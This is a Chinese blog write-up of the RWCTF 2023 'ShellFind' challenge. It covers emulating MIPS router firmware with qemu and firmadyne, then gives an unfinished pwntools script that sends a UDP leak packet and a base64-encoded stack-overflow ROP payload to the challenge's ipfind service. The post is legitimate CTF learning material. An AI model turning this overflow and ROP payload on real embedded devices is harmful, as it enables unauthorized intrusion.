

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Vang3lis">
  <meta name="keywords" content="">
  <title>RWCTF 2023 ShellFind - Vang3lis&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_6peoq002giu.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>0x13</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2023-02-08 10:21" pubdate>
      2023年2月8日 上午
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      24
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">RWCTF 2023 ShellFind</h1>
            
            <div class="markdown-body" id="post-body">
              <h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>这题主要当时搭建环境用了很多时间，导致最后没时间写<code>exp</code>，在此记录一下环境搭建的过程</p>
<p>主要环境搭建还是有三种办法：<code>qemu-system</code>起<code>mips system</code>环境；<code>qemu-user</code>起单个二进制文件；<code>firmadyne</code>起<code>mips system</code>环境</p>
<h3 id="qemu-system"><a href="#qemu-system" class="headerlink" title="qemu-system"></a>qemu-system</h3><p>从<a target="_blank" rel="noopener" href="https://people.debian.org/~aurel32/qemu/mips/">aurel32 mips</a>中下载对应的<code>qemu</code>镜像</p>
<p>在起系统之前需要建立<code>qemu</code>系统和宿主机之间的网络桥接</p>
<p>依次运行以下指令</p>
<ol>
<li><code>sudo apt-get install bridge-utils uml-utilities</code></li>
<li><code>sudo gedit /etc/network/interfaces</code></li>
</ol>
<pre><code class="hljs properties"><span class="hljs-attr">auto</span> <span class="hljs-string">lo</span>
<span class="hljs-attr">iface</span> <span class="hljs-string">lo inet loopback</span>

<span class="hljs-attr">auto</span> <span class="hljs-string">ens33</span>
<span class="hljs-attr">iface</span> <span class="hljs-string">ens33 inet dhcp</span>

<span class="hljs-comment">#auto br0</span>
<span class="hljs-attr">iface</span> <span class="hljs-string">br0 inet dhcp</span>
  <span class="hljs-attr">bridge_ports</span> <span class="hljs-string">ens33</span>
  <span class="hljs-attr">bridge_maxwait</span> <span class="hljs-string">0</span></code></pre>

<ol start="3">
<li><code>sudo gedit /etc/qemu-ifup</code> （最后添加几行）</li>
</ol>
<pre><code class="hljs routeros"><span class="hljs-comment">#! /bin/sh</span>
<span class="hljs-comment"># Script to bring a network (tap) device for qemu up.</span>
<span class="hljs-comment"># The idea is to add the tap device to the same bridge</span>
<span class="hljs-comment"># as we have default routing to.</span>

<span class="hljs-comment"># in order to be able to find brctl</span>
<span class="hljs-attribute">PATH</span>=<span class="hljs-variable">$PATH</span>:/sbin:/usr/sbin
<span class="hljs-attribute">ip</span>=$(which ip)

<span class="hljs-keyword">if</span> [ -n <span class="hljs-string">&quot;<span class="hljs-variable">$ip</span>&quot;</span> ]; then
  <span class="hljs-built_in"> ip </span>link <span class="hljs-builtin-name">set</span> <span class="hljs-string">&quot;<span class="hljs-variable">$1</span>&quot;</span> up
<span class="hljs-keyword">else</span>
   <span class="hljs-attribute">brctl</span>=$(which brctl)
   <span class="hljs-keyword">if</span> [ ! <span class="hljs-string">&quot;<span class="hljs-variable">$ip</span>&quot;</span> -o ! <span class="hljs-string">&quot;<span class="hljs-variable">$brctl</span>&quot;</span> ]; then
     echo <span class="hljs-string">&quot;W: <span class="hljs-variable">$0</span>: not doing any bridge processing: neither ip nor brctl utility not found&quot;</span> &gt;&amp;2
     exit 0
   fi
   ifconfig <span class="hljs-string">&quot;<span class="hljs-variable">$1</span>&quot;</span> 0.0.0.0 up
fi

<span class="hljs-attribute">switch</span>=$(ip<span class="hljs-built_in"> route </span>ls | \
    awk <span class="hljs-string">&#x27;/^default / &#123;</span>
<span class="hljs-string">          for(i=0;i&lt;NF;i++) &#123; if ($i == &quot;dev&quot;) &#123; print $(i+1); next; &#125; &#125;</span>
<span class="hljs-string">         &#125;&#x27;</span>
        )

<span class="hljs-comment"># only add the interface to default-route bridge if we</span>
<span class="hljs-comment"># have such interface (with default route) and if that</span>
<span class="hljs-comment"># interface is actually a bridge.</span>
<span class="hljs-comment"># It is possible to have several default routes too</span>
<span class="hljs-keyword">for</span> br <span class="hljs-keyword">in</span> <span class="hljs-variable">$switch</span>; <span class="hljs-keyword">do</span>
    <span class="hljs-keyword">if</span> [ -d /sys/class/net/<span class="hljs-variable">$br</span>/bridge/. ]; then
        <span class="hljs-keyword">if</span> [ -n <span class="hljs-string">&quot;<span class="hljs-variable">$ip</span>&quot;</span> ]; then
         <span class="hljs-built_in"> ip </span>link <span class="hljs-builtin-name">set</span> <span class="hljs-string">&quot;<span class="hljs-variable">$1</span>&quot;</span> master <span class="hljs-string">&quot;<span class="hljs-variable">$br</span>&quot;</span>
        <span class="hljs-keyword">else</span>
          brctl addif <span class="hljs-variable">$br</span> <span class="hljs-string">&quot;<span class="hljs-variable">$1</span>&quot;</span>
        fi
        exit	# exit with status of the previous command
    fi
done

echo <span class="hljs-string">&quot;W: <span class="hljs-variable">$0</span>: no bridge for guest interface found&quot;</span> &gt;&amp;2

<span class="hljs-comment">################################################################</span>
<span class="hljs-comment">#!/bin/sh</span>
sudo /sbin/ifconfig <span class="hljs-variable">$1</span> 0.0.0.0 promisc up
sudo /sbin/brctl addif br0 <span class="hljs-variable">$1</span>
sleep 3</code></pre>

<ol start="4">
<li><code>sudo chmod a+x /etc/qemu-ifup</code></li>
<li><code>sudo service network-manager restart</code> 重启服务</li>
<li><code>sudo ifconfig ens33 down</code> 关闭<code>ens33</code></li>
<li><code>sudo ifup br0</code> 起<code>br0</code>桥接，看到类似如下内容即成功了<pre><code class="hljs angelscript">Internet Systems Consortium DHCP Client <span class="hljs-number">4.4</span><span class="hljs-number">.1</span>
Copyright <span class="hljs-number">2004</span><span class="hljs-number">-2018</span> Internet Systems Consortium.
All rights reserved.
For info, please visit https:<span class="hljs-comment">//www.isc.org/software/dhcp/</span>

Listening on LPF/br0/<span class="hljs-number">00</span>:<span class="hljs-number">0</span>c:<span class="hljs-number">29</span>:ae:<span class="hljs-number">1</span>b:<span class="hljs-number">28</span>
Sending on   LPF/br0/<span class="hljs-number">00</span>:<span class="hljs-number">0</span>c:<span class="hljs-number">29</span>:ae:<span class="hljs-number">1</span>b:<span class="hljs-number">28</span>
Sending on   Socket/fallback
Created duid <span class="hljs-string">&quot;\000\001\000\001+J\377\&quot;\000\014)\256\033(&quot;</span>.
DHCPDISCOVER on br0 to <span class="hljs-number">255.255</span><span class="hljs-number">.255</span><span class="hljs-number">.255</span> port <span class="hljs-number">67</span> <span class="hljs-built_in">int</span>erval <span class="hljs-number">3</span> (xid=<span class="hljs-number">0xcab4930e</span>)
DHCPOFFER of <span class="hljs-number">192.168</span><span class="hljs-number">.152</span><span class="hljs-number">.132</span> <span class="hljs-keyword">from</span> <span class="hljs-number">192.168</span><span class="hljs-number">.152</span><span class="hljs-number">.254</span>
DHCPREQUEST <span class="hljs-keyword">for</span> <span class="hljs-number">192.168</span><span class="hljs-number">.152</span><span class="hljs-number">.132</span> on br0 to <span class="hljs-number">255.255</span><span class="hljs-number">.255</span><span class="hljs-number">.255</span> port <span class="hljs-number">67</span> (xid=<span class="hljs-number">0xe93b4ca</span>)
DHCPACK of <span class="hljs-number">192.168</span><span class="hljs-number">.152</span><span class="hljs-number">.132</span> <span class="hljs-keyword">from</span> <span class="hljs-number">192.168</span><span class="hljs-number">.152</span><span class="hljs-number">.254</span> (xid=<span class="hljs-number">0xcab4930e</span>)
bound to <span class="hljs-number">192.168</span><span class="hljs-number">.152</span><span class="hljs-number">.132</span> -- renewal <span class="hljs-keyword">in</span> <span class="hljs-number">853</span> seconds.</code></pre>

</li>
</ol>
<p>通过<code>ifconfig</code>看<code>ip</code></p>
<p>通过如下命令，起<code>qemu system</code></p>
<pre><code class="hljs shell">sudo qemu-system-mips -M malta \
    -kernel vmlinux-2.6.32-5-4kc-malta \
    -hda debian_squeeze_mips_standard.qcow2 \
    -append &quot;root=/dev/sda1 console=tty0&quot; \
    -net nic \
    -net tap \
    -nographic</code></pre>

<p>通过如下指令进行，切换系统</p>
<pre><code class="hljs awk">scp -r .<span class="hljs-regexp">/squashfs-root/</span> root@<span class="hljs-number">192.168</span>.<span class="hljs-number">152.133</span>:<span class="hljs-regexp">/root/</span>
chroot <span class="hljs-regexp">/root/</span>squashfs-root sh</code></pre>

<h3 id="qemu-user"><a href="#qemu-user" class="headerlink" title="qemu-user"></a>qemu-user</h3><p>当找到核心关键的二进制文件之后，通过如下指令进行调试</p>
<pre><code class="hljs apache"><span class="hljs-attribute">sudo</span> qemu-mips -g <span class="hljs-number">12345</span> -L . ./usr/sbin/ipfind eth<span class="hljs-number">0</span></code></pre>

<p><code>gdbscript</code>如下</p>
<pre><code class="hljs awk"><span class="hljs-comment"># set architecture mips</span>
<span class="hljs-comment"># set endian big</span>
file <span class="hljs-regexp">/mnt/</span>d<span class="hljs-regexp">/Desktop/</span>ctf<span class="hljs-regexp">/rwctf2023/</span>firmware<span class="hljs-regexp">/_firmware.bin.extracted/</span>squashfs-root<span class="hljs-regexp">/usr/</span>sbin/ipfind
set sysroot <span class="hljs-regexp">/mnt/</span>d<span class="hljs-regexp">/Desktop/</span>ctf<span class="hljs-regexp">/rwctf2023/</span>firmware<span class="hljs-regexp">/_firmware.bin.extracted/</span>squashfs-root
target remote:<span class="hljs-number">12345</span>
tb *<span class="hljs-number">0</span>x401088
tb *<span class="hljs-number">0</span>x401078</code></pre>

<h3 id="firmadyne"><a href="#firmadyne" class="headerlink" title="firmadyne"></a>firmadyne</h3><p>可以直接通过<code>AttifyOS</code>中的<code>firmadyne</code>直接运行</p>
<p>最好的是，该系统可以直接运行固件系统自启时的一些服务，从而直接看到什么服务是自启的，而不用自己去找</p>
<p>当然也可以自己查看<code>/etc/rc.d/rcS.d/</code></p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><p>写<code>exp</code>的时候，实话说，很久没写过<code>mips rop</code>就基本不怎么会写了，一开始完全没注意到是<code>NX disabled</code>的，然后对于库函数的使用，最开始的时候没恢复<code>$gp</code>，后面再写的时候基本就时间不够了</p>
<p>一个未写完的<code>exp</code></p>
<pre><code class="hljs routeros">import socket
import sys
<span class="hljs-keyword">from</span> pwn import *
import base64


TARGET_IP = <span class="hljs-string">&quot;172.25.67.200&quot;</span>
TARGET_PORT = 62720
bufferSize          = 1024

serverAddressPort   = (TARGET_IP, TARGET_PORT)

context.log_level = <span class="hljs-string">&quot;debug&quot;</span>

io = remote(TARGET_IP, TARGET_PORT, <span class="hljs-attribute">typ</span>=<span class="hljs-string">&quot;udp&quot;</span>)

def leakMacAddress():
    # leak
    msgFromClient = b<span class="hljs-string">&#x27;FIVI&#x27;</span>
    msgFromClient += b<span class="hljs-string">&#x27;1234&#x27;</span>
    # mac
    # 52 54 00 12 34 56
    #msgFromClient += b<span class="hljs-string">&#x27;\x52\x54\x00\x12\x34\x56&#x27;</span>
    msgFromClient += p8(10)
    msgFromClient += p8(1) # magic <span class="hljs-keyword">to</span> bypass 1 check at 0x402684
    msgFromClient += p8(0) # bypass at 0x40268C
    msgFromClient += p8(4)
    msgFromClient += b<span class="hljs-string">&#x27;a&#x27;</span><span class="hljs-number">*0</span>x4
    msgFromClient += b<span class="hljs-string">&#x27;8&#x27;</span>
    msgFromClient += b<span class="hljs-string">&#x27;\xff&#x27;</span><span class="hljs-number">*6</span> # maybe fake mac address
    msgFromClient += p16(0) # v8
    msgFromClient += p32(0) # v17
    msgFromClient += b<span class="hljs-string">&#x27;x&#x27;</span><span class="hljs-number">*0</span>x20
    io.sendline(msgFromClient)

def pwn():
    # 0x00400e40: addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20; lw <span class="hljs-variable">$ra</span>, 0x1c(<span class="hljs-variable">$sp</span>); jr <span class="hljs-variable">$ra</span>; addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20;
    # .text:004020B0  move <span class="hljs-variable">$a0</span>, <span class="hljs-variable">$s0</span>;
    # .text:00400F3C
    # 0x00400d70: lw <span class="hljs-variable">$t9</span>, (<span class="hljs-variable">$s0</span>); addiu <span class="hljs-variable">$s1</span>, <span class="hljs-variable">$s1</span>, 1; move <span class="hljs-variable">$a2</span>, <span class="hljs-variable">$s5</span>; move <span class="hljs-variable">$a1</span>, <span class="hljs-variable">$s4</span>; jalr <span class="hljs-variable">$t9</span>; move <span class="hljs-variable">$a0</span>, <span class="hljs-variable">$s3</span>;
    # .text:00401220
    # 0x00400c9c : lw <span class="hljs-variable">$gp</span>, 0x10(<span class="hljs-variable">$sp</span>) ; lw <span class="hljs-variable">$ra</span>, 0x1c(<span class="hljs-variable">$sp</span>) ; jr <span class="hljs-variable">$ra</span> ; addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20
    # 00402ac0 : lw <span class="hljs-variable">$gp</span>, 0x10(<span class="hljs-variable">$sp</span>) ; lw <span class="hljs-variable">$ra</span>, 0x1c(<span class="hljs-variable">$sp</span>) ; jr <span class="hljs-variable">$ra</span> ; addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20

    # 0x41b030
    gp = b<span class="hljs-string">&quot;\x00\x41\xb0\x30&quot;</span>


    # lw <span class="hljs-variable">$gp</span>, 0x10(<span class="hljs-variable">$sp</span>) ; lw <span class="hljs-variable">$ra</span>, 0x1c(<span class="hljs-variable">$sp</span>) ; jr <span class="hljs-variable">$ra</span> ; addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20
    gadget1 = b<span class="hljs-string">&quot;\x00\x40\x2A\xC0&quot;</span>
    # call sendto
    gadget2 = b<span class="hljs-string">&quot;\x00\x40\x1D\x7C&quot;</span>
    # addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20; lw <span class="hljs-variable">$ra</span>, 0x1c(<span class="hljs-variable">$sp</span>); jr <span class="hljs-variable">$ra</span>; addiu <span class="hljs-variable">$sp</span>, <span class="hljs-variable">$sp</span>, 0x20;
    gadget3 = b<span class="hljs-string">&quot;\x00\x40\x0e\x40&quot;</span>



    payload = b<span class="hljs-string">&quot;A&quot;</span><span class="hljs-number">*0</span>x240+b<span class="hljs-string">&quot;B&quot;</span><span class="hljs-number">*0</span>x4+b<span class="hljs-string">&quot;C&quot;</span><span class="hljs-number">*0</span>x4+b<span class="hljs-string">&quot;D&quot;</span><span class="hljs-number">*0</span>x4
    # 0x402ac0: <span class="hljs-builtin-name">set</span> gp
    payload += gadget1
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x10
    # <span class="hljs-variable">$gp</span>: 0x41b030
    payload += gp
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x8
    payload += gadget3
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x20
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x1c
    payload += gadget3
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x4
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x20
    payload += b<span class="hljs-string">&quot;X&quot;</span><span class="hljs-number">*0</span>x1c
    payload += gadget2

    msgFromClient = b<span class="hljs-string">&#x27;FIVI&#x27;</span>
    msgFromClient += b<span class="hljs-string">&#x27;1234&#x27;</span>
    # mac
    # 52 54 00 12 34 56
    #msgFromClient += b<span class="hljs-string">&#x27;\x52\x54\x00\x12\x34\x56&#x27;</span>
    msgFromClient += p8(10)
    msgFromClient += p8(2) # magic <span class="hljs-keyword">to</span> bypass 1 check at 0x402684
    msgFromClient += p8(0) # bypass at 0x40268C
    msgFromClient += p8(4)
    msgFromClient += b<span class="hljs-string">&#x27;a&#x27;</span><span class="hljs-number">*0</span>x4
    msgFromClient += b<span class="hljs-string">&#x27;8&#x27;</span>
    # msgFromClient += b<span class="hljs-string">&#x27;\x52\x54\x00\x12\x34\x56&#x27;</span> # maybe fake mac address
    msgFromClient += b<span class="hljs-string">&#x27;\x00\x15\x5d\xb3\x71\x6a&#x27;</span> # maybe fake mac address
    msgFromClient += p16(0) # v8
    msgFromClient += p32(0x8E) # v17
    msgFromClient += b<span class="hljs-string">&#x27;x&#x27;</span><span class="hljs-number">*0</span>x40  # username
    msgFromClient += base64.b64encode(payload)
    io.sendline(msgFromClient)

pwn()
io.interactive()</code></pre>

<p>官方<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/Wb7SMy8AHtiv71kroHEHsQ">exp</a></p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>之前翻到另外一个镜像的仓库，但是这个仓库里的镜像不能起起来，可能是我用法没用对</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://people.debian.org/~jcowgill/qemu-mips/">https://people.debian.org/~jcowgill/qemu-mips/</a></p>
</blockquote>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/228726.html">https://www.freebuf.com/vuls/228726.html</a><br><a target="_blank" rel="noopener" href="https://people.debian.org/~aurel32/qemu/mips/">https://people.debian.org/~aurel32/qemu/mips/</a><br><a target="_blank" rel="noopener" href="https://gist.github.com/extremecoders-re/3ddddce9416fc8b293198cd13891b68c">https://gist.github.com/extremecoders-re/3ddddce9416fc8b293198cd13891b68c</a></p>
</blockquote>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/mips/">mips</a>
                    
                      <a class="hover-with-bg" href="/tags/firmware/">firmware</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/10/22/CVE-2022-37696%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                        <span class="hidden-mobile">CVE-2022-37696 漏洞复现</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "RWCTF 2023 ShellFind&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















</body>
</html>
